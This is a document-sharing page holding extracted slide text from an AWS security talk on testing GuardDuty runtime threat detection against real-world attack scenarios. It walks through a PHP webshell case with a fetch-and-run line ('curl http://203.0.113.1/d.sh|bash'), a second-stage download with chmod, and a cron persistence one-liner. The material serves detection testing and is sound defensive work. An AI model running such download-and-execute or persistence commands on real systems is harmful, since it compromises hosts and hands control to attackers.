测试 GuardDuty 的运行时检测：实际应用真实攻击场景.pdf

《测试 GuardDuty 的运行时检测：实际应用真实攻击场景.pdf》由会员分享，可在线阅读，更多相关《测试 GuardDuty 的运行时检测：实际应用真实攻击场景.pdf（11页珍藏版）》请在三个皮匠报告上搜索。

1、 2025,Amazon Web Services,Inc.or its affiliates.All rights reserved.2025,Amazon Web Services,Inc.or its affiliates.All rights reserved.S E C 4 1 1Testing GuardDutys Runtime Detections:Hands-on with real world attack scenariosMuhammad Wasiq 2025,Amazon Web Services,Inc.or its affiliates.All rights re

2、served.What is GuardDuty Runtime Monitoring?GuardDuty is threat detection service Runtime monitoring is an optional feature Uses eBPF Sensorecho*#command#tmp_cron&crontab#tmp_cron eBPF SensorProcessesFile openEC2 Instance Amazon GuardDutybackendE 2025,Amazon Web Services,Inc.or its affiliates.All ri

3、ghts reserved.Why do you need to test?Evaluate the runtime monitoring service Simulate incident response Isolated/simple tests are common Single Mitre technique Not realistic No insights about noise filteringecho*#command#tmp_cron&crontab#tmp_cron T1105-Download a script using curl or wget and run i

4、tT1222.002 chmod-Change file or folder mode T1053.003-Create a cron jobT1053.003-Create a cron job 2025,Amazon Web Services,Inc.or its affiliates.All rights reserved.Real world Attacks-Customer incidents AWS CIRT engagements Top 2 initial access techniques:Compromised credentials Public-facing appli

5、cation compromise 2025,Amazon Web Services,Inc.or its affiliates.All rights reserved.Threat Intelligence GuardDuty uses In-house and Third Party threat intel sourcesTactics and techniquesContextIndicators of compromise 2025,Amazon Web Services,Inc.or its affiliates.All rights reserved.Realworld Scen

6、ario PHP WebshellWebshellE3DC4533F48E7.phpE3DC4533F48E7.phpScript malwarecurl http:/203.0.113.1/d.sh|bashcurl http:/203.0.113.1/d.sh|bashSecond stage malwarecurl http:/203.0.113.1/download curl http:/203.0.113.1/download o/o/tmptmp/run/runchmodchmod+x/chmod+x/